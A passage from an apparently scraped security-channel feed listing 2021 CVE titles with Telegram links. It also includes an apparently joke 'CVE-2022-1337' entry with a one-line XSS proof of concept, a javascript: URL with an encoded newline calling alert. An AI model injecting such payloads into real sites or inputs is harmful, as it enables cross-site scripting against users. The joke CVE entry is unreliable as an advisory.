OGNL Inj\nhttps://t.me/cybersecuritytechnologies/4202\nCVE-2021-42013 - Apache 2.4.50 Path Traversal\nhttps://t.me/cybersecuritytechnologies/4475\nCVE-2021-22205 - GitLab CE/EE RCE\nhttps://t.me/cybersecuritytechnologies/4602\nCVE-2021-40449 - UaF in the NtGdiResetDC function of the Win32k driver\nhttps://t.me/cybersecuritytechnologies/4535\nCVE-2021-40438 - SSRF in Apache2 mod_proxy\nhttps://t.me/cybersecuritytechnologies/4529\nCVE-2021-30858 - UaF in WebKit\nhttps://t.me/cybersecuritytechnologies/4545\nCVE-2021-30883 - iOS IOMFB vulnerability\nhttps://t.me/cybersecuritytechnologies/4497\nCVE-2021-30892 - Shrootless Vulnerability in MacOS\nhttps://t.me/cybersecuritytechnologies/4623\nCVE-2022-1337 - \"View Source\"\nhttps://mobile.twitter.com/megab0t_/status/1452848917205458945\nPoC: JavaScript:https://#%0aalert('xss')", "creation_timestamp": "2021-11-08T11:07:01.000000Z"}]}